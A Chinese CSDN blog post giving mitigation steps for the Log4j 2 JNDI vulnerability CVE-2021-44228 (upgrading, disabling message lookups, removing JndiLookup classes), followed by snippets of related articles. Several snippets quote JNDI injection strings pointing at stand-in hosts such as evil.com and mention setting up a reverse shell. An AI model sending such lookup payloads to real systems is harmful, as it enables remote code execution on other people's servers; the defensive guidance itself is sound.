Apache Log4j 2 漏洞修复指南(CVE-2021-44228)

已于 2022-01-27 10:06:01 修改
阅读量8.7k 收藏 2
点赞数 2
文章标签: apache 安全 java
于 2021-12-10 22:27:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq237696047/article/details/121866120
版权

Apache Log4j 2 漏洞修复指南

CVE-2021-44228

Log4j 团队已注意到一个安全漏洞 CVE-2021-44228,该漏洞已在 Log4j 2.15.0 中得到解决。
最新版Log4j 2.17.1已发布,建议更新到2.17.1

Log4j 的 JNDI 支持没有限制可以解析的名称。某些协议不安全或允许远程代码执行。Log4j 现在默认将协议限制为仅 java、ldap 和 ldaps,并将 ldap 协议限制为默认仅访问本地主机上提供的 Java 原始对象。

允许暴露此漏洞的一个向量是 Log4j 允许查找出现在日志消息中。从 Log4j 2.15.0 开始,此功能现在默认禁用。虽然提供了以这种方式启用查找的选项,但强烈建议用户不要启用它。

无法升级到 2.15.0 的用户可以通过以下方式减轻风险:

Log4j 2.10 或更高版本的用户可以添加 -Dlog4j.formatMsgNoLookups=true 作为命令行选项或将 log4j.formatMsgNoLookups=true 添加到类路径上的 log4j2.component.properties 文件中以防止查找日志事件消息。
Log4j 2.7 以后的用户可以在 PatternLayout 配置中指定 %m{nolookups} 以防止在日志事件消息中查找。
从 log4j-core jar 中删除 JndiLookup 和 JndiManager 类。删除 JndiManager 将导致 JndiContextSelector 和 JMSAppender 不再起作用。

官方更新代码地址https://logging.apache.org/log4j/2.x/download.html

盛邦log4j检测工具:https://github.com/webraybtl/Log4j

在这里插入图片描述

Me4神秘
关注
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1417
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
使用 Elastic Security 检测 CVE-2021-44228 (log4j2) 的漏洞利用
点火三周的专栏
12-12 5780
重要的提示 : 要了解 Elastic 当前如何评估我们产品中此漏洞的内部风险,请参阅此处 概述 这篇博文提供了 CVE-2021-44228 的摘要,并为 Elastic Security 用户提供了检测,以发现他们环境中对该漏洞的主动利用。 随着我们了解更多信息,我们将持续提供更多的更新。截至 2021 年 12 月 11 日星期六,此版本是准确的。可以通过Log4j2的安全页面直接调查来自 Apache 的更新。 CVE-2021-44228 (Log4Shell) 摘要 Lo...
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
apache-log4j-2.16.0-bin.zip
CVE-2021-44228 Log4j2漏洞复现
Cover-3321的博客
01-07 1964
apache log4j: 是java语言中的日志处理套件/程序。2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。
CVE-2021-44228 漏洞复现
最新发布
weixin_69065643的博客
07-31 335
以上可以看到有三个服务,看到熟悉的rmi和ldap ,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入..这里在注入之前另启动一个终端开启监听..发现/solr/admin/cores?action=,可以上传参数,使用dnslog,让其返回Java版本号。下载JDNI,放到攻击机,输入如下命令。拿取JDK1.8的ldap直接访问。开始准备反弹shell。在攻击机开启监听端口。
CVE-2021-44228漏洞复现
m0_65764670的博客
05-29 1769
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 2230
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Apache Log4j2远程代码执行漏洞CVE-2021-44228)复现
qq_40640917的博客
01-10 2521
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
apache-log4j-2.14.0-bin.zip
03-01
2021年,Log4j 2曾发现一个严重漏洞CVE-2021-44228),该漏洞允许远程代码执行。因此,保持Log4j到最新版本至关重要,以确保应用免受潜在的安全威胁。 总的来说,Apache Log4j 2.14.0是一个强大的日志工具,它...
apache-log4j-2.14.1-bin.zip
05-28
安全方面,Log4j 2.14.1版本修复了过去的安全漏洞,特别是著名的Log4Shell漏洞CVE-2021-44228),这是一个远程代码执行漏洞,影响了大量使用Log4j的系统。更新到最新版本对于保持系统的安全性至关重要。 总之,...
log4j2-2.15.0RC2
12-17
2021年12月初,一个名为CVE-2021-44228的严重漏洞被公开,该漏洞影响了Log4j2的2.x版本,允许攻击者通过注入恶意代码来控制受影响的系统。这个漏洞被称为“Log4Shell”,其危害程度极高,因为它只需要在日志消息中...
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 842
CVE-2021-44228
CVE-2021-44228Apache Log4j2 JNDI注入漏洞
qq_61553520的博客
05-24 1165
Log4jApache软件基金会下的一个开源项目,通过使用log4j可以打印程序日志输出信息到控制台,文件等各种地方。简单来说,它是一个用于记录日志的Java第三方库,而且使用量非常广泛。在2021年12月9日,Log4j2爆出极其严重的漏洞,攻击者只需要构造恶意数据植入日志记录中,就可以导致任意代码执行,危害极大,利用门槛极低。
Apache Log4j2远程代码执行漏洞CVE-2021-44228
Arlo的博客
12-30 1599
发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apache Log4j2是一个基于Java的日志记录工具,是Log4j的升级,在其前身Log4j 1.x基础上提供了Logback中可用的很多优化,同时修复了Logback架构中的一些问题,是目前最优秀的Java日志框架之一。该日志框架被大量用于业务系统开发,用来记录日志信息。开发者可能会将用户输入造成的错误信息写
Log4j2远程代码执行漏洞复现(cve-2021-44228)
热门推荐
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4jApache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
CVE-2021-44228 Apache Log4j2 远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-03 4485
Apache Log4j2 是 Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广。
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228
qq_45751902的博客
10-05 944
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
apache log4j2 任意代码执行漏洞(cve-2021-44228)
09-18
Apache Log4j2是一个广泛使用的开源日志管理工具。然而,最近发现了一个严重的漏洞,被命名为CVE-2021-44228。这个漏洞允许攻击者通过恶意构造的日志事件来执行任意代码,导致系统被远程攻击者完全控制。 漏洞是由于Log4j2中的PatternLayout布局处理器存在一个特定的模式转换字符(%d、%i、%m、%p等)被恶意利用的问题。攻击者可以将恶意代码嵌入到日志事件中,并通过向受影响的Log4j2实例发送恶意请求触发此漏洞。一旦攻击成功,攻击者可以在受影响的应用程序上执行任意的远程代码。 这个漏洞的危害性非常高,因为日志功能几乎在每个应用程序中都得到广泛使用。攻击者可以通过恶意日志事件执行各种攻击,包括远程命令执行、数据库注入、代码执行等。受影响的应用程序可能会泄露敏感数据、遭受损坏甚至被完全控制。 解决这个漏洞的最佳方法是升级到Log4j2的最新版本。Apache已经发布了修复漏洞的版本,更具体地说是2.15.0和2.16.0,这些版本不再处理这类模式转换字符。如果无法立即更新,可以考虑在应用程序中禁用PatternLayout布局处理器,或者使用其他日志管理框架替代Log4j2。 此外,还建议及时监测应用程序的日志活动,并对异常的日志事件进行审查。如果遇到可疑的日志事件,应立即采取行动,例如暂停相关服务、排查日志事件来源、加强网络安全防护等。 总之,Apache Log4j2的CVE-2021-44228漏洞是一个严重的安全威胁,可能导致系统被完全控制。及时升级到修复版本、加强监控和审查日志活动是应对该漏洞的关键步骤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值